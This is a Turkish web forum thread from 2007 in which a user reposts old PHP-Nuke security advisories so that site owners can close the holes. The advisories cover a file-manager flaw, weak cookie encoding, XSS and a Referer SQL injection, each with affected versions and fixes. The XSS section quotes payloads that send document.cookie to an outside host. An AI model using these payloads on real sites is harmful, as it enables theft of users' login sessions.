Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 1148
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 ??? Sitem deki Haberleri ..
(25357 okuma, 26 yanıt)
 Free Hosta Php Nuke Kurul..
(16448 okuma, 14 yanıt)
 EKLENTİ: Misafire mesajın..
(36858 okuma, 38 yanıt)
 Php Nuke 9.0 Geliyor..
(20859 okuma, 19 yanıt)
 Bu başlık için mesaj bulu..
(14012 okuma, 15 yanıt)
 Facebook Sohbet Tipi Sohb..
(17739 okuma, 15 yanıt)
 üye aktivasyon..
(10631 okuma, 8 yanıt)
 Facebook tarzı altbar... ..
(6258 okuma, 1 yanıt)
 kaldırmak istediğim bölüm..
(6530 okuma, 2 yanıt)
 Resimli RSS..
(23218 okuma, 25 yanıt)
 Onay linkini kaldirmak..
(11065 okuma, 8 yanıt)
 Yardım :( Site açılırken ..
(6633 okuma, 2 yanıt)
 .Htaccess ile uzantıda ke..
(8258 okuma, 4 yanıt)
 block genişliği..
(5701 okuma, 1 yanıt)
 Haber Resimleri ve Slide ..
(14373 okuma, 12 yanıt)
 Foruma büyük boyutlu resi..
(7298 okuma, 3 yanıt)
 Php-Nuke 8.0 Paket..
(9419 okuma, 6 yanıt)
 Hangi sürümü önerirsiniz?..
(10483 okuma, 8 yanıt)
 ethai1 3..
(13143 okuma, 10 yanıt)
 Yeni PEHASPESEO..
(69803 okuma, 82 yanıt)
 Türkçe Karakter sorunu ?..
(37709 okuma, 36 yanıt)
 tek modul için sağ ve sol..
(11396 okuma, 8 yanıt)
 Php-nuke8.0 başlıklarda t..
(10574 okuma, 8 yanıt)
 Phpden iyi anlayan..
(5413 okuma, 1 yanıt)
 Php nuke 7.6 - 3.1 patch ..
(73181 okuma, 89 yanıt)
 Mp3 Üst Player Yardım..
(29482 okuma, 40 yanıt)
 Toplu üyelik silme?..
(11108 okuma, 8 yanıt)
 Çözümleyemediğim hata.....
(12368 okuma, 11 yanıt)
 bloğu kayan hale getirmek..
(5962 okuma, 2 yanıt)
 Makale modulu..
(8575 okuma, 5 yanıt)
 PHP-Nuke Haber V.1 Paylas..
(85170 okuma, 121 yanıt)
 title değiştirme..
(10290 okuma, 6 yanıt)
 Arkadaşlar bu sorunun çöz..
(10024 okuma, 6 yanıt)
 Php Nuke 8.1..
(4339 okuma, 0 yanıt)
 merhaba..
(10263 okuma, 9 yanıt)
 Anasayfa için boş modül o..
(13477 okuma, 13 yanıt)
 admin panelinde Access De..
(6377 okuma, 2 yanıt)
 Bu başlığa hiç cevap gelm..
(26364 okuma, 25 yanıt)
 Nuke Tema yapilisi..
(17094 okuma, 16 yanıt)
 Mavisce-net temasina bann..
(8714 okuma, 6 yanıt)
 PHP-Nuke wTeam - eklentil..
(6629 okuma, 2 yanıt)
 coppermine hata..
(10672 okuma, 8 yanıt)
 içerik tanıtımı..
(6270 okuma, 2 yanıt)
 Haber Ve İçeriğe Resim Ek..
(7154 okuma, 3 yanıt)
 google keywords..
(8949 okuma, 6 yanıt)
 8.0'da html sorunu..
(5492 okuma, 1 yanıt)
 PHP-Nuke_8.1.3.5+NukeSent..
(53989 okuma, 76 yanıt)
 üye olunurken gereksiz is..
(10005 okuma, 7 yanıt)
 Arkadaşlar kolifa haber s..
(6348 okuma, 2 yanıt)
 Hesabınız'a tıklayınca te..
(10483 okuma, 7 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Php-Nuke ve Güvenlik açıkları..
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Php-Nuke ve Güvenlik açıkları..

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
asimcan
Mesaj: 500+
Mesaj: 500+





Kayıt: Aug 30, 2007
Mesajlar: 834
Konum: istanbul

MesajTarih: 2007-10-05, 22:59:28    Mesaj konusu: Php-Nuke ve Güvenlik açıkları.. Alıntıyla Cevap Gönder

Kullandığımız portallar ne kadar güvenli birde burdan bakalım..

PHP Nuke dosya kopyalama ve silme açığı ;

PHP Nuke, PHP script dili ile uygulanmış bir web portal yaratma ve yönetim
paketidir. Varsayılan kurulum ile, sunucu dosya sistemindeki dosyaları kopyalama
ve silmede kullanılabilen 'admin/case/case.filemanager.php' script`i gelmektedir.
Script, sadece kimlik tanılamasında sorumlu bir administrative script`ten çağrıldığına
emin olan bir kod içeriyor fakat bunun uygulanışı hatalı. Sonuç olarak uzaktaki
herhangi bir kullanıcı kimlik tanılaması olmadan direk olarak script`i çağırabilir ve
script`in çalıştığı kullanıcı haklarına göre sunucu üzerinde herhangi bir dosyayı
kopyalayabilir, silebilir.

Çözüm:
Magnux Software aşağıdaki çözümü önermiş:
Web sunucusu dosya sistemine erişimi engellemek için aşağıdaki komutlar
kullanılabilir:
# cd php-nuke-document-root
# chmod 0 admin/case/case.filemanager.php
Henüz bir yama çıkmadı.

ref: http://www.securityfocus.com/bid/3510


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.2

Etkilenmeyenler:


PHP Nuke kullanıcı c o o k i e`si zayıf kriptolama açığı

Bir kullanıcıya PHP-Nuke tabanlı bir sayfada kimlik tanılaması uygulandığında
kullanıcı hesabı ve şifreyi içeren bir c o o k i e yaratılıyor. Şifre 'Base 64 encoding' ile
kodlanıyor ve c o o k i e içeriğine erişebilen herkes tarafından kolaylıkla dekod
edilebilir. Bunun sonucunda kullanıcının hesabının ele geçirilmesi mümkün.
PHP-Nuke`un eski sürümlerininde bu açıktan etkilenmesi muhtemel. PostNuke
0.6.4`de bu açıktan etkileniyor.

Çözüm:
Henüz bir yama çıkmadı

ref: http://www.securityfocus.com/bid/3567


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32

Etkilenmeyenler:

PHP-Nuke çapraz site betik çalıştırma açıkları

PHP-Nuke'da çeşitli çapraz site betik çalıştırma (XSS-Cross Site Scripting) açıkları olduğu rapor edildi.
Bir saldırgan, kullanıcıların kötü amaçlı bir linki ziyaret etmesini sağlayarak bu açıktan yararlanabilir. Saldırganın sağladığı HTML ve betik kodu web istemcisinde çalıştırılabilir.

Saldırganlar bu açığı web içeriğini farklı göstermek veya çerez-tabanlı kimlik tanılama bilgilerini çalmak için kullanabilirler.

Örnek:
Aşağıdaki örnekler Matthew Murphy tarafından sağlanmış:
<SCRI*PT>location.href="http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref="+document.URL+"c o o k i e="+document.c o o k i e;

<B
STYLE="left:expression(e v a l('location.href=\'http://www.techie.hopto.org/
fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'c o o k i e=\'+
document.c o o k i e'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">Keep
Away!</B>

Çözüm:
Henüz bir yama çıkmadı.


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

Etkilenmeyenler:

PHP-Nuke HTTP "referer" SQL sorgusu ekleme açığı

HTTP başlığının referer alanında gönderilen veriler, index.php dosyasında SQL sorgusunda kullanılmadan önce doğru olarak filtrelenmiyor.
Açığın 7.9 sürümünde olduğu onaylandı ve 8.0 sürümünün de etkilendiği rapor edildi. Diğer sürümler de etkileniyor olabilir.

Çözüm:
index.php kaynak kodunda değişiklik yaparak doğru filtrelemenin yapılmasını sağlayın.

Kaynak: http://secunia.com/advisories/24224/


Etkilenen Sistemler
Etkilenenler:

PHP-Nuke 5.x
PHP-Nuke 6.x
PHP-Nuke 7.x
PHP-Nuke 8.x

Etkilenmeyenler:

PHP-Nuke Signature alanı XSS açığı

PHP-Nuke'ta yeni bir çapraz site betik çalıştırma açığı bulunduğu rapor edildi. Web isteklerinin düzgün kontrol edilmemesi sonucu betik kodlarının PHP script isteklerine gömülmesi mümkün oluyor.
Bu sayede uzaktaki bir saldırgan çerez-tabanlı kimlik tanılama bilgilerini çalabilir.

Çözüm:
Henüz bir yama çıkmadı.

kaynak: http://online.securityfocus.com/bid/6503


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1

Etkilenmeyenler:

PHPNuke Cross-Site Scripting güvenlik açığı

PHPNuke cross-site scripting açığından etkileniyor. Kötü amaçlı script kodunu içeren
PHPNuke kullanıcı bilgileri sayfası user.php`ye bir link yaratmak mümkün.
Durumdan şüphelenmeyen bir web kullanıcısı linke tıkladığında kötü amaçlı kod
çalışıyor.
Bu saldırı ile bir kullanıcının, etkilenen PHPNuke sitesine ait c o o k i e`lerdeki kimlik
tanılama bilgileri çalınabilir.
PostNuke`un da etkilendiği rapor edildi.
Aşağıdaki örnek bir alarm kutusunu görüntülenmesini sağlıyor:
http://phpnukesite/user.php?op=userinfo&uname=<script>a l e r t(document.c o o k i e);</script>

Çözüm:
Geçici çözüm:
Web browser`ın özelliklerini kullanarak JavaScript çalıştırılmasını kapatın.
Henüz bir yama çıkmadı.

ref: http://www.securityfocus.com/bid/3609


Etkilenen Sistemler
Etkilenenler:

Francisco Burzi PHP-Nuke 1.0
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.4.1a
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.62
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.63
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32

Etkilenmeyenler:

( Alıntıdır )

Php-Nuke içinde bunların dışında bildiğiniz açıklar varsa burda yazmanızı öneririm. ki bizde ona göre açıklarımızı kapatıp daha güvenli bir web sitesi hazırlayalım..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-06-01, 23:32:41    Mesaj konusu: Forum Arası Reklamlar


Başa dön
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2007-10-05, 23:12:33    Mesaj konusu: Alıntıyla Cevap Gönder

yazını sonuna kadar okudum bu güzel paylaşım için teşekürler.Biraz yorum yapmak gerekirse artık bu hack metotları eskide kaldı ancak biri dikkatimi çekti.http önerenlerde sql açığı demişsin. nuke 8 de dahil olmak üzere etkileniyor demişsin.İndex.php değşiiklik ile giderilebilinir diye bir ibare var bunu biraz daha açıklayabilimisin?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asimcan
Mesaj: 500+
Mesaj: 500+





Kayıt: Aug 30, 2007
Mesajlar: 834
Konum: istanbul

MesajTarih: 2007-10-05, 23:17:24    Mesaj konusu: Alıntıyla Cevap Gönder

hocam altınada yazdığım gibi alıntıdır. ingilizceniz varsa o kısımda verilen linkten çözüme ulaşabilirsiniz sanırım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok nuke için sağ tarafta kayan reklam sC... Rapcoast Php Nuke Sorunlarınız 13 2010-07-21, 17:55:35 Son Mesajı Görüntüle
Yeni mesaj yok NetOpsiyon Nuke Son Yoklama ramrodboy İşbirliği&Etkinlikler 26 2010-07-17, 14:26:48 Son Mesajı Görüntüle
Yeni mesaj yok php-nuke Den Kayıp Yapmadan Başka Sis... DursunKaptan Php Nuke Sorunlarınız 18 2010-07-16, 20:05:43 Son Mesajı Görüntüle
Yeni mesaj yok Artisteer ile Nuke'ye Tema hazirlama bozkurt69 Php Nuke Tema Paylaşımları 7 2010-07-15, 12:54:19 Son Mesajı Görüntüle
Yeni mesaj yok Nuke sentinelin sorgulamasındaki bir ... mtalha88 Php Nuke Güvenlik 0 2010-07-15, 00:21:17 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright